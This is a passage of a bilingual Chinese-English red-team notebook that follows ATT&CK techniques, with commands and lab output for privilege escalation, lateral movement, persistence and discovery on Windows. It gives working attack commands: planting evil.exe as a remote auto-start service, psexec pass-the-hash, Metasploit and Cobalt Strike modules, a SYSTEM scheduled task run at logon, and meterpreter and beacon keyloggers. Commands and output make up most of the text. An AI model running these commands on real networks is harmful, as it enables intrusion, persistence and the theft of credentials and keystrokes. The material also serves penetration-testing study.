For example, if C:\example path precedes C:\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line.

Check for common privilege escalation methods

terminal下操作(借助powershell)

powershell -ep bypass .\powerup.ps1 Invoke-AllChecks

powershell -ExecutionPolicy Bypass .\powerup.ps1 Invoke-AllChecks

PS C:\Users\Administrator\Desktop\powrshell> powershell -ep bypass .\powerup.ps1 Invoke-AllChecks
PS C:\Users\Administrator\Desktop\powrshell> powershell -ExecutionPolicy Bypass .\powerup.ps1 Invoke-AllChecks
PS C:\Users\Administrator\Desktop\powrshell> powershell -ExecutionPolicy Bypass -File .\powerup.ps1

msf下操作:

exploit/windows/local/trusted_service_path

msf5 exploit(windows/local/trusted_service_path) > exploit
[*] Started reverse TCP handler on 192.168.2.107:4444
[*] Finding a vulnerable service...
[-] Exploit aborted due to failure: not-vulnerable: No service found with trusted path issues
[*] Exploit completed, but no session was created.

cs下操作:

powershell-import /path/to/PowerUp.ps1

powershell Invoke-AllChecks

beacon> powershell C:\Users\Administrator\Desktop\powrshell\powerup.ps1
[*] Tasked beacon to run: C:\Users\Administrator\Desktop\powrshell\powerup.ps1
[+] host called home, sent: 203 bytes
[-] could not spawn powershell -nop -exec bypass -EncodedCommand QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgBcAEQAZQBzAGsAdABvAHAAXABwAG8AdwByAHMAaABlAGwAbABcAHAAbwB3AGUAcgB1AHAALgBwAHMAMQA=: 2
beacon> powershell Invoke-AllChecks
[*] Tasked beacon to run: Invoke-AllChecks

(服务执行)Service Execution

Create a new service remotely(远程创建一个新服务)

terminal下操作

net use \COMP\ADMIN$ "password" /user:DOMAIN_NAME\UserName

copy evil.exe \COMP\ADMIN$\acachsrv.exe

sc \COMP create acachsrv binPath= "C:\Windows\System32\acachsrv.exe" start= auto description= "Description here" DisplayName= "DisplayName"

sc \COMP start acachsrv

C:\Documents and Settings\Administrator>net use \\COMP\ADMIN$ "password" /user:D
OMAIN_NAME\UserName
发生系统错误 67。
找不到网络名。
C:\Documents and Settings\Administrator>copy evil.exe \\COMP\ADMIN$\System32\aca
chsrv.exe
系统找不到指定的文件。
C:\Documents and Settings\Administrator>sc \\COMP create acachsrv binPath= "C:\W
indows\System32\acachsrv.exe" start= auto DisplayName= "DisplayName"
[SC] OpenSCManager 失败 1722:
RPC 服务器不可用。
C:\Documents and Settings\Administrator>sc \\COMP start acachsrv
[SC] OpenSCManager 失败 1722:
RPC 服务器不可用。

cs下操作:

shell net use \COMP\ADMIN$ "password" /user:DOMAIN_NAME\UserName

shell copy evil.exe \COMP\ADMIN$\acachsrv.exe

shell sc \COMP create acachsrv binPath= "C:\Windows\System32\acachsrv.exe" start= auto description= "Description here" DisplayName= "DisplayName"

shell sc \COMP start acachsrv

C:\Documents and Settings\Administrator>net use \\COMP\ADMIN$ "password" /user:D
OMAIN_NAME\UserName
发生系统错误 67。
找不到网络名。
C:\Documents and Settings\Administrator>copy evil.exe \\COMP\ADMIN$\System32\aca
chsrv.exe
系统找不到指定的文件。
C:\Documents and Settings\Administrator>sc \\COMP create acachsrv binPath= "C:\W
indows\System32\acachsrv.exe" start= auto DisplayName= "DisplayName"
[SC] OpenSCManager 失败 1722:
RPC 服务器不可用。
C:\Documents and Settings\Administrator>sc \\COMP start acachsrv
[SC] OpenSCManager 失败 1722:
RPC 服务器不可用。

Create a new service remotely (using psexec)(使用psexec创建新的远程服务)

原理:

psexec copies over a file to the remote box via SMB, then creates a service (usually a randomly named one) which points to the binary that was just copied over, starts the service, then deletes the service.
使用psexec通过smb复制文件,然后创建一个指向刚刚复制过来的二进制文件的随机名的服务,然后启动、删除服务

terminal下操作:

psexec /accepteula \ip -u domain\user -p password -c -f \smbip\share\file.exe (Copy and execute file.exe on the remote system)

psexec /accepteula \ip -u domain\user -p lm:ntlm cmd.exe /c dir c:\Progra~1 (Run cmd.exe on the remote system using the lm:ntlm password hash - aka pass the hash)

psexec /accepteula \ip -s cmd.exe (Run cmd.exe on the remote box as the SYSTEM user account)

msf下操作:

exploit/windows/smb/psexec

exploit/windows/local/current_user_psexec

auxiliary/admin/smb/psexec_command

auxiliary/scanner/smb/psexec_loggedin_users

exploit/windows/smb/psexec_psh

msf5 exploit(multi/handler) > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/smb/psexec) > set rhosts 192.168.2.103
rhosts => 192.168.2.103
msf5 exploit(windows/smb/psexec) > exploit
[-] Handler failed to bind to 192.168.2.103:4444:- -
[-] Handler failed to bind to 0.0.0.0:4444:- -
[-] 192.168.2.103:445 - Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/psexec) > use exploit/windows/local/current_user_psexec
msf5 exploit(windows/local/current_user_psexec) > show options
Module options (exploit/windows/local/current_user_psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
DISPNAME no Service display name (Default: random)
INTERNAL_ADDRESS no Session's internal address or hostname for the victims to grab the payload from (Default: detected)
KERBEROS false yes Authenticate via Kerberos, dont resolve hostnames
NAME no Service name on each target in RHOSTS (Default: random)
RHOSTS no Target address range or CIDR identifier
SESSION yes The session to run this module on.
TECHNIQUE PSH yes Technique to use (Accepted: PSH, SMB)
Exploit target:
Id Name
-- ----
0 Universal
msf5 exploit(windows/local/current_user_psexec) > set session 1
session => 1
msf5 exploit(windows/local/current_user_psexec) > exploit
msf5 exploit(windows/local/current_user_psexec) > use auxiliary/admin/smb/psexec_command
msf5 auxiliary(admin/smb/psexec_command) > show options
Module options (auxiliary/admin/smb/psexec_command):
Name Current Setting Required Description
---- --------------- -------- -----------
COMMAND net group "Domain Admins" /domain yes The command you want to execute on the remote host
RHOSTS yes The target address range or CIDR identifier
RPORT 445 yes The Target port
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBSHARE C$ yes The name of a writeable share on the server
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads
WINPATH WINDOWS yes The name of the remote Windows directory
msf5 auxiliary(admin/smb/psexec_command) > set rhosts 192.168.2.103
rhosts => 192.168.2.103
msf5 auxiliary(admin/smb/psexec_command) > exploit
[*] 192.168.2.103:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(admin/smb/psexec_command) > use auxiliary/scanner/smb/psexec_loggedin_users
msf5 auxiliary(scanner/smb/psexec_loggedin_users) > show options
Module options (auxiliary/scanner/smb/psexec_loggedin_users):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 445 yes The Target port
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBSHARE C$ yes The name of a writeable share on the server
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads
USERNAME no The name of a specific user to search for
WINPATH WINDOWS yes The name of the Windows directory
msf5 auxiliary(scanner/smb/psexec_loggedin_users) > set rhosts 192.168.2.103
rhosts => 192.168.2.103
msf5 auxiliary(scanner/smb/psexec_loggedin_users) > exploit
[-] 192.168.2.103:445 - The connection was refused by the remote host (192.168.2.103:445).
[*] 192.168.2.103:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/psexec_loggedin_users) > use exploit/windows/smb/psexec_psh
msf5 exploit(windows/smb/psexec_psh) > show options
Module options (exploit/windows/smb/psexec_psh):
Name Current Setting Required Description
---- --------------- -------- -----------
DryRun false no Prints the powershell command that would be used
RHOSTS yes The target address range or CIDR identifier
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/smb/psexec_psh) > set rhosts 192.168.2.103
rhosts => 192.168.2.103
msf5 exploit(windows/smb/psexec_psh) > exploit

cs下操作:

psexec COMP_NAME {listener name} (via sc)

psexec_sh COMP_NAME {listener name} (via powershell)

(DLL劫持)DLL Search Order Hijacking

原理:

Windows systems use a common method to look for required DLLs to load into a program. [1] Adversaries may take advantage of the Windows DLL search order and programs that ambiguously specify DLLs to gain privilege escalation and persistence.
Adversaries may perform DLL preloading, also called binary planting attacks, [2] by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. [3] Adversaries may use this behavior to cause the program to load a malicious DLL.
Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL to maintain persistence or privilege escalation. [4] [5] [6]
If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program.
Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.
通俗的来理解就是windows下的dll文件可以被替换或可以修改.manifest或.local重定向文件、目录或连接来直接修改程序加载DLL来达到权限提升或者其他的效果。

Check for common privilege escalation methods(常见的提权方法检测)

terminal下操作:

powershell.exe -epbypass PowerUp.ps1 Invoke-AllChecks

PS C:\Users\Administrator\Desktop\powrshell> powershell -ExecutionPolicy Bypass .\powerup.ps1 Invoke-AllChecks

msf下操作:

exploit/windows/local/trusted_service_path

msf5 exploit(windows/local/trusted_service_path) > show options
Module options (exploit/windows/local/trusted_service_path):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Exploit target:
Id Name
-- ----
0 Windows
msf5 exploit(windows/local/trusted_service_path) > set session 1
session => 1
msf5 exploit(windows/local/trusted_service_path) > exploit
[-] Handler failed to bind to 192.168.2.103:4444:- -
[-] Handler failed to bind to 0.0.0.0:4444:- -
[*] Finding a vulnerable service...
[-] Exploit aborted due to failure: not-vulnerable: No service found with trusted path issues
[*] Exploit completed, but no session was created.

cs下操作:

powershell-import /path/to/PowerUp.ps1

powershell Invoke-AllChecks

(文件系统权限不足)File System Permissions Weakness

原理:

Processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.
Services
Manipulation of Windows service binaries is one variation of this technique. Adversaries may replace a legitimate service executable with their own executable to gain persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService). Once the service is started, either directly by the user (if appropriate access is available) or through some other means, such as a system restart if the service starts on bootup, the replaced executable will run instead of the original service executable.
Executable Installers
Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of DLL Search Order Hijacking. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to Bypass User Account Control. Several examples of this weakness in existing common installers have been reported to software vendors. [1] [2]
简单来说就是可以替换文件、服务或者使用安装文件来获取权限

Check for common privilege escalation methods(常见的提权方法检测)

terminal下操作:

powershell.exe -epbypass PowerUp.ps1

Invoke-AllChecks

PS C:\Users\Administrator\Desktop\powrshell> Invoke-AllChecks
[*] Running Invoke-AllChecks
[+] Current user already has local administrative privileges!
[*] Checking for unquoted service paths...
ServiceName : VOneMgrSvcForNG
Path : C:\Program Files (x86)\NGVONE\Client\sv_service.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users; Permissions=AppendData/AddSu
bdirectory}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'VOneMgrSvcForNG' -Path <HijackPath>
CanRestart : True
ServiceName : VOneMgrSvcForNG
Path : C:\Program Files (x86)\NGVONE\Client\sv_service.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users; Permissions=System.Object[]}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'VOneMgrSvcForNG' -Path <HijackPath>
CanRestart : True
ServiceName : VOneMgrSvcForNG
Path : C:\Program Files (x86)\NGVONE\Client\sv_service.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Administrators; Permissions=System.Object[]}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'VOneMgrSvcForNG' -Path <HijackPath>
CanRestart : True

msf下操作:

exploit/windows/local/trusted_service_path

msf5 exploit(windows/local/trusted_service_path) > exploit
[*] Started reverse TCP handler on 192.168.2.103:4444
[*] Finding a vulnerable service...
[-] Exploit aborted due to failure: not-vulnerable: No service found with trusted path issues
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/trusted_service_path) >

(系统网络连接发现)System Network Connections Discovery

Get current TCP/IP connections(获取当前TCP/IP连接)

terminal下操作:

netstat -ano

PS C:\Users\Administrator\Desktop\powrshell> netstat -ano
活动连接
协议 本地地址 外部地址 状态 PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 860
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:515 0.0.0.0:0 LISTENING 2988
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 376
TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 64
TCP 0.0.0.0:7443 0.0.0.0:0 LISTENING 5712
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 496
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1248
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1136
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 2028
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 2612
TCP 0.0.0.0:49672 0.0.0.0:0 LISTENING 604
TCP 0.0.0.0:49673 0.0.0.0:0 LISTENING 2784
TCP 0.0.0.0:49683 0.0.0.0:0 LISTENING 632
TCP 127.0.0.1:3443 0.0.0.0:0 LISTENING 3416
TCP 127.0.0.1:35432 0.0.0.0:0 LISTENING 3456
TCP 127.0.0.1:49677 127.0.0.1:49678 ESTABLISHED 3416
TCP 127.0.0.1:49678 127.0.0.1:49677 ESTABLISHED 3416
TCP 192.168.97.132:139 0.0.0.0:0 LISTENING 4
TCP 192.168.97.132:50215 40.90.189.152:443 ESTABLISHED 2740
TCP 192.168.97.132:50231 185.199.109.153:443 TIME_WAIT 0
TCP 192.168.97.132:50232 172.217.25.13:443 TIME_WAIT 0
TCP 192.168.97.132:50233 203.208.39.227:443 TIME_WAIT 0
TCP 192.168.97.132:50235 203.208.50.94:443 TIME_WAIT 0
TCP 192.168.97.132:50236 216.58.197.99:443 TIME_WAIT 0
TCP 192.168.97.132:50237 203.208.39.227:80 TIME_WAIT 0
TCP 192.168.97.132:50238 216.117.2.180:443 TIME_WAIT 0
TCP 192.168.97.132:50241 203.208.43.77:443 TIME_WAIT 0
TCP 192.168.97.132:50242 203.208.40.62:443 TIME_WAIT 0
TCP 192.168.97.132:50244 3.224.99.7:443 TIME_WAIT 0
TCP 192.168.97.132:50246 172.217.31.234:443 TIME_WAIT 0
TCP 192.168.97.132:50247 54.186.190.8:443 TIME_WAIT 0
TCP 192.168.97.132:50248 3.213.73.75:443 TIME_WAIT 0
TCP 192.168.97.132:50249 216.117.2.180:443 TIME_WAIT 0
TCP 192.168.97.132:50250 216.117.2.180:443 TIME_WAIT 0
TCP 192.168.97.132:50251 216.117.2.180:443 TIME_WAIT 0
TCP 192.168.97.132:50252 123.129.254.12:80 TIME_WAIT 0
TCP 192.168.97.132:50253 123.129.254.12:80 TIME_WAIT 0
TCP 192.168.97.132:50256 216.58.221.238:443 TIME_WAIT 0
TCP 192.168.97.132:50257 52.139.250.253:443 ESTABLISHED 2740
TCP [::]:135 [::]:0 LISTENING 860
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:515 [::]:0 LISTENING 2988
TCP [::]:3389 [::]:0 LISTENING 376
TCP [::]:49664 [::]:0 LISTENING 496
TCP [::]:49665 [::]:0 LISTENING 1248
TCP [::]:49666 [::]:0 LISTENING 1136
TCP [::]:49667 [::]:0 LISTENING 2028
TCP [::]:49668 [::]:0 LISTENING 2612
TCP [::]:49672 [::]:0 LISTENING 604
TCP [::]:49673 [::]:0 LISTENING 2784
TCP [::]:49683 [::]:0 LISTENING 632
TCP [::1]:35432 [::]:0 LISTENING 3456
TCP [::1]:35432 [::1]:50211 ESTABLISHED 3456
TCP [::1]:35432 [::1]:50212 ESTABLISHED 3456
TCP [::1]:35432 [::1]:50213 ESTABLISHED 3456
TCP [::1]:35432 [::1]:50214 ESTABLISHED 3456
TCP [::1]:50211 [::1]:35432 ESTABLISHED 3416
TCP [::1]:50212 [::1]:35432 ESTABLISHED 3416
TCP [::1]:50213 [::1]:35432 ESTABLISHED 3416
TCP [::1]:50214 [::1]:35432 ESTABLISHED 3416
UDP 0.0.0.0:500 *:* 2772
UDP 0.0.0.0:3389 *:* 376
UDP 0.0.0.0:4500 *:* 2772
UDP 0.0.0.0:5050 *:* 64
UDP 0.0.0.0:5353 *:* 2204
UDP 0.0.0.0:5355 *:* 2204
UDP 0.0.0.0:58658 *:* 5712
UDP 127.0.0.1:1900 *:* 2268
UDP 127.0.0.1:4499 *:* 236
UDP 127.0.0.1:58657 *:* 5712
UDP 127.0.0.1:62902 *:* 2268
UDP 127.0.0.1:63142 *:* 3260
UDP 192.168.97.132:137 *:* 4
UDP 192.168.97.132:138 *:* 4
UDP 192.168.97.132:1900 *:* 2268
UDP 192.168.97.132:62901 *:* 2268
UDP [::]:500 *:* 2772
UDP [::]:3389 *:* 376
UDP [::]:4500 *:* 2772
UDP [::]:5353 *:* 2204
UDP [::]:5355 *:* 2204
UDP [::1]:1900 *:* 2268
UDP [::1]:62900 *:* 2268
UDP [::1]:63143 *:* 3456
UDP [fe80::bc99:52b6:7f3b:cdb8%11]:1900 *:* 2268
UDP [fe80::bc99:52b6:7f3b:cdb8%11]:62899 *:* 2268

msf下操作:

/post/windows/gather/tcpnetstat

msf5 exploit(windows/local/trusted_service_path) > use post/windows/gather/tcpnetstat
msf5 post(windows/gather/tcpnetstat) > show options
Module options (post/windows/gather/tcpnetstat):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
msf5 post(windows/gather/tcpnetstat) > set session 1
session => 1
msf5 post(windows/gather/tcpnetstat) > exploit
[*] TCP Table Size: 472
[*] Total TCP Entries: 13
[*] Connection Table
================
STATE LHOST LPORT RHOST RPORT
----- ----- ----- ----- -----
ESTABLISHED 192.168.2.114 1068 192.168.2.103 5555
LISTEN 0.0.0.0 80 0.0.0.0 _
LISTEN 0.0.0.0 135 0.0.0.0 _
LISTEN 0.0.0.0 445 0.0.0.0 _
LISTEN 0.0.0.0 1025 0.0.0.0 _
LISTEN 0.0.0.0 1026 0.0.0.0 _
LISTEN 0.0.0.0 1035 0.0.0.0 _
LISTEN 0.0.0.0 1801 0.0.0.0 _
LISTEN 0.0.0.0 2103 0.0.0.0 _
LISTEN 0.0.0.0 2105 0.0.0.0 _
LISTEN 0.0.0.0 2107 0.0.0.0 _
LISTEN 0.0.0.0 3306 0.0.0.0 _
LISTEN 192.168.2.114 139 0.0.0.0 _
[*] Post module execution completed

cs下操作:

shell c:\windows\sysnative\netstat.exe -ano

beacon> shell c:\windows\system32\netstat.exe -ano
[*] Tasked beacon to run: c:\windows\system32\netstat.exe -ano
[+] host called home, sent: 67 bytes
[+] received output:
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 1100
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 688
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING 400
TCP 0.0.0.0:1026 0.0.0.0:0 LISTENING 984
TCP 0.0.0.0:1035 0.0.0.0:0 LISTENING 1932
TCP 0.0.0.0:1801 0.0.0.0:0 LISTENING 1932
TCP 0.0.0.0:2103 0.0.0.0:0 LISTENING 1932
TCP 0.0.0.0:2105 0.0.0.0:0 LISTENING 1932
TCP 0.0.0.0:2107 0.0.0.0:0 LISTENING 1932
TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING 1252
TCP 192.168.2.114:139 0.0.0.0:0 LISTENING 4
TCP 192.168.2.114:1068 192.168.2.103:5555 ESTABLISHED 572
TCP 192.168.2.114:1530 192.168.2.105:139 TIME_WAIT 0
TCP 192.168.2.114:1531 192.168.2.105:139 TIME_WAIT 0
TCP 192.168.2.114:1532 120.41.45.100:80 TIME_WAIT 0
UDP 0.0.0.0:445 *:* 4
UDP 0.0.0.0:500 *:* 400
UDP 0.0.0.0:1027 *:* 748
UDP 0.0.0.0:1034 *:* 1932
UDP 0.0.0.0:3527 *:* 1932
UDP 0.0.0.0:4500 *:* 400
UDP 127.0.0.1:123 *:* 800
UDP 192.168.2.114:123 *:* 800
UDP 192.168.2.114:137 *:* 4
UDP 192.168.2.114:138 *:* 4

Display active SMB sessions(显示活动的smb会话)

terminal下操作:

net session | find / "\"

PS C:\Users\Administrator\Desktop\powrshell> net session | find / "\\"
FIND: 无效的开关

msf下操作:

post/windows/gather/enum_logged_on_users

msf5 post(windows/gather/tcpnetstat) > use post/windows/gather/enum_logged_on_users
msf5 post(windows/gather/enum_logged_on_users) > show options
Module options (post/windows/gather/enum_logged_on_users):
Name Current Setting Required Description
---- --------------- -------- -----------
CURRENT true yes Enumerate currently logged on users
RECENT true yes Enumerate Recently logged on users
SESSION yes The session to run this module on.
msf5 post(windows/gather/enum_logged_on_users) > set session 1
session => 1
msf5 post(windows/gather/enum_logged_on_users) > exploit
[*] Running against session 1
Current Logged Users
====================
SID User
--- ----
S-1-5-21-1911985068-4225083820-4011728908-500 ROOT-5DE52AC98B\Administrator
[+] Results saved in: /root/.msf4/loot/20190907124429_default_192.168.2.114_host.users.activ_626805.txt
Recently Logged Users
=====================
SID Profile Path
--- ------------
S-1-5-18 %systemroot%\system32\config\systemprofile
S-1-5-19 %SystemDrive%\Documents and Settings\LocalService
S-1-5-20 %SystemDrive%\Documents and Settings\NetworkService
S-1-5-21-1911985068-4225083820-4011728908-500 %SystemDrive%\Documents and Settings\Administrator
[*] Post module execution completed

cs下操作:

shell net session | find / "\"

beacon> shell net session | find / "\\"
[*] Tasked beacon to run: net session | find / "\\"

(计划任务)Scheduled Task

原理:

Utilities such as at and schtasks, along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time. A task can also be scheduled on a remote system, provided the proper authentication is met to use RPC and file and printer sharing is turned on. Scheduling a task on a remote system typically required being a member of the Administrators group on the the remote system. [1]
An adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct remote Execution as part of Lateral Movement, to gain SYSTEM privileges, or to run a process under the context of a specified account.
主要就是使用at或者sc命令去启动一个程序,不过需要满足使用RPC的适当身份验证

Display all currently scheduled tasks(显示所有的计划任务)

terminal下操作:

schtasks [/s HOSTNAME]

PS C:\Users\Administrator\Desktop\powrshell> schtasks
文件夹: \
任务名 下次运行时间 模式
======================================== ====================== ===============
信息: 目前在你的访问级别上不存在任何可用的计划任务。
文件夹: \Microsoft
任务名 下次运行时间 模式
======================================== ====================== ===============
信息: 目前在你的访问级别上不存在任何可用的计划任务。
文件夹: \Microsoft\Windows
任务名 下次运行时间 模式
======================================== ====================== ===============
信息: 目前在你的访问级别上不存在任何可用的计划任务。
文件夹: \Microsoft\Windows\.NET Framework

cs下操作:

shell schtasks

beacon> shell schtasks
[*] Tasked beacon to run: schtasks
[+] host called home, sent: 39 bytes
[+] received output:
信息: 系统里没有计划任务。

Create a scheduled task(创建一个计划任务)

terminal下操作:

schtasks [/S HOSTNAME] /create /tn "acachesrv" /tr C:\file\path\here.exe /sc ONLOGON /ru "System" [/rp password]
Requirements for running scheduled tasks:
net start schedule
sc config schedule start= auto
PS C:\Users\Administrator\Desktop\powrshell> net start schedule
请求的服务已经启动。
请键入 NET HELPMSG 2182 以获得更多的帮助。
PS C:\Users\Administrator\Desktop\powrshell> schtasks /create /tn "acachesrv" /tr C:\file\path\here.exe /sc ONLOGON /ru
"System"
成功: 成功创建计划任务 "acachesrv"。

cs下操作:

shell schtasks [/S HOSTNAME] /create /tn "acachesrv" /tr C:\file\path\here.exe /sc ONLOGON /ru "System" [/rp password]
Requirements for running scheduled tasks:
shell net start schedule
shell sc config schedule start= auto

(输入捕捉(键盘记录))Input Capture

Start a keylogger(开始键盘记录)

msf下操作:

starting the keylogger:

keyscan_start

when you're ready to get the logs:

keyscan_dump

when you're done keylogging:

keyscan_stop

meterpreter > keyscan_start
Starting the keystroke sniffer ...
meterpreter > keyscan_dump
Dumping captured keystrokes...
1513215212
meterpreter > keyscan_stop
Stopping the keystroke sniffer...

cs下操作:

keylogger 1320 x86(进程名、系统版本)

beacon> keylogger 1200 x86
[*] Tasked beacon to log keystrokes in 1200 (x86)
[+] host called home, sent: 65610 bytes
[-] could not open process 1200: 5
[-] Could not connect to pipe: 2
[+] received keystrokes
[+] received keystrokes
beacon> keylogger 1328 null
[*] Tasked beacon to log keystrokes in 1328 (null)
[+] host called home, sent: 65610 bytes
[-] could not open process 1328: 5
[-] Could not connect to pipe: 2
[+] received keystrokes

(进程获取)Process Discovery

Enumerate running processes(枚举运行的进程)

terminal下操作:

tasklist /v [/svc]

net start

qprocess *

PS C:\Users\Administrator\Desktop\powrshell> tasklist /svc
映像名称 PID 服务
========================= ======== ============================================
System Idle Process 0 暂缺
System 4 暂缺
Registry 88 暂缺
smss.exe 296 暂缺
csrss.exe 396 暂缺
wininit.exe 496 暂缺
csrss.exe 508 暂缺
winlogon.exe 588 暂缺
services.exe 604 暂缺
lsass.exe 632 KeyIso, SamSs
svchost.exe 732 BrokerInfrastructure, DcomLaunch, Power,
SystemEventsBroker
fontdrvhost.exe 744 暂缺
fontdrvhost.exe 812 暂缺
svchost.exe 860 RpcEptMapper, RpcSs
svchost.exe 904 LSM
dwm.exe 1000 暂缺
svchost.exe 376 TermService
svchost.exe 656 CoreMessagingRegistrar
svchost.exe 808 lmhosts
svchost.exe 1120 NcbService
svchost.exe 1136 Schedule
svchost.exe 1176 ProfSvc
svchost.exe 1248 EventLog
svchost.exe 1300 UserManager
svchost.exe 1332 nsi
svchost.exe 1348 UmRdpService
svchost.exe 1420 TimeBrokerSvc
svchost.exe 1444 Dhcp
svchost.exe 1512 CertPropSvc
svchost.exe 1548 EventSystem
svchost.exe 1580 SysMain
svchost.exe 1616 Themes
Memory Compression 1716 暂缺
WUDFHost.exe 1736 暂缺
svchost.exe 1792 LanmanWorkstation
svchost.exe 1812 SENS
svchost.exe 1844 NlaSvc
svchost.exe 1892 AudioEndpointBuilder
svchost.exe 1916 FontCache
svchost.exe 2028 SessionEnv
svchost.exe 2036 Audiosrv
svchost.exe 2064 netprofm
svchost.exe 2204 Dnscache
svchost.exe 2220 DusmSvc
svchost.exe 2240 Wcmsvc
svchost.exe 2276 StateRepository
svchost.exe 2504 WlanSvc
svchost.exe 2544 ShellHWDetection
spoolsv.exe 2612 Spooler
svchost.exe 2648 BFE, mpssvc
svchost.exe 2772 IKEEXT
svchost.exe 2784 PolicyAgent
wvs_supervisor.exe 2844 Acunetix
pg_ctl.exe 2852 Acunetix Database
svchost.exe 2860 CryptSvc
svchost.exe 2884 DPS
FNPLicensingService.exe 2900 FlexNet Licensing Service
svchost.exe 2928 Winmgmt
svchost.exe 2988 LPDSVC
svchost.exe 3016 LanmanServer
svchost.exe 1656 SstpSvc
vmtoolsd.exe 2364 VMTools
svchost.exe 2312 TrkWks
sv_service.exe 236 VOneMgrSvcForNG
svchost.exe 2740 WpnService
svchost.exe 3236 WdiServiceHost
svchost.exe 3260 iphlpsvc
opsrv.exe 3416 暂缺
svchost.exe 3448 RasMan
postgres.exe 3456 暂缺
conhost.exe 3464 暂缺
conhost.exe 3516 暂缺
dllhost.exe 3976 COMSysApp
postgres.exe 644 暂缺
postgres.exe 2892 暂缺
postgres.exe 660 暂缺
postgres.exe 2920 暂缺
postgres.exe 2880 暂缺
msdtc.exe 4256 MSDTC
svchost.exe 4972 CDPUserSvc_56a0b
